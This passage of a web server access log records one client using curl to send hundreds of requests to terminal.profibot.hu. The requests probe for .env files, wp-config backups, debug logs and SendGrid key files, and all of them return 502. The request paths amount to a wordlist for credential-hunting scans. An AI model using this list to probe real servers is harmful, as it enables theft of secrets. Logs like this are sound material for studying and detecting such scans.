+0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v8.0/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v9.0/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/tests/drupal-test/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/tests/Integration/Environment/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/tests/todo-react/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/testwork_json/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/theme/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/theme_static/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/thumb/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/thumbs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/tiedostot/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/time.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/tmp/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/tmp/config/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/tmp/logs" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/token.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/tool/view/phpinfo.view.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/tools/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/Travel_form/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/ts/prime/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/tz.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/u.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/ubuntu/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/ui/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/unixtime/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/unsplash-downloader/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/up.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/upfiles/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/upload/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/uploads/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/urlmem-app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/user/.env.staging" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/user/login" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/User_info/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/v1/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/v1/admin/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/v1/debug/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/v1/private/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:38 +0000] - - 502 - GET https terminal.profibot.hu "/v2/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/var/backup/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/github.com/gobuffalo/envy/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/vendor/github.com/subosito/gotenv/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/vendors~main.f286c0f60bdc707d91a8.bundle.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/vercel.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/videos/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/vite.config.ts" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/vm-docker-compose/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/vod_installer/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/vue-end/vue-til/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/vue/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/vue/vuecli/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/vue_CRM/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/w.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/web-dist/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/web.config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/web.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/web/debug/default/view" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/Web/siteMariage/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/webpack-stats.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/webpack.config.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/webroot_path/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/website/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/websocket/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/webstatic/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/webui/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/well-known/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/whturk/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/windows/tests/9.2.x/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/windows/tests/9.3.x/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/wordpress/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:39 +0000] - - 502 - GET https terminal.profibot.hu "/workspace/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.old" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php-backup" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php~" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/debug.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wp-login.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wp-login/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wp.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wp/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wpp-config.php~" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/www-data/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/x.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/xx-final/vue-heroes/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/yarn.lock" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/zmusic-frontend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/:443/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/:80/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/:8080/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/:8081/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/:8443/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid_email/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/.env.sendgrid" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid_keys.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/private/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/config/private/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/backup/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/secrets/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:40 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/plugins/wp-mail-smtp/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/plugins/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/modules/contrib/sendgrid_mail/sendgrid_mail.module" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/modules/contrib/sendgrid_mail/sendgrid_mail.settings.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/modules/contrib/sendgrid_mail/sendgrid_mail.services.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/modules/contrib/sendgrid_mail/translations/sendgrid_mail.fr.po" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/themes/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/uploads/wp-mail-smtp/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/backup/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/wp-includes/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/wp-content/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/wp-admin/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid_keys" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/.sendgrid/credentials" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/.sendgrid/config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/sendgrid_config.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/private/sendgrid_keys" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/private/sendgrid_config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/backup/sendgrid_keys" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/backup/sendgrid_config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/secrets/sendgrid_keys" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/secrets/sendgrid_config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/sendgrid.py" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/settings/sendgrid_keys" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/settings/sendgrid_config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/settings/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/settings/sendgrid_config.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/env/sendgrid.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/config/env/sendgrid_keys.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/instance/sendgrid_keys.py" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid_keys.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid_keys.py" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:41 +0000] - - 502 - GET https terminal.profibot.hu "/keys/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/api_keys/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/config/packages/sendgrid.yaml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/config/secrets/prod/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/config/secrets/dev/sendgrid_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/config/sendgrid.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/storage/sendgrid.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/backup/sendgrid.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/secrets/sendgrid.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/config/sendgrid.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:42 +0000] - - 502 - GET https terminal.profibot.hu "/private/sendgrid.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to 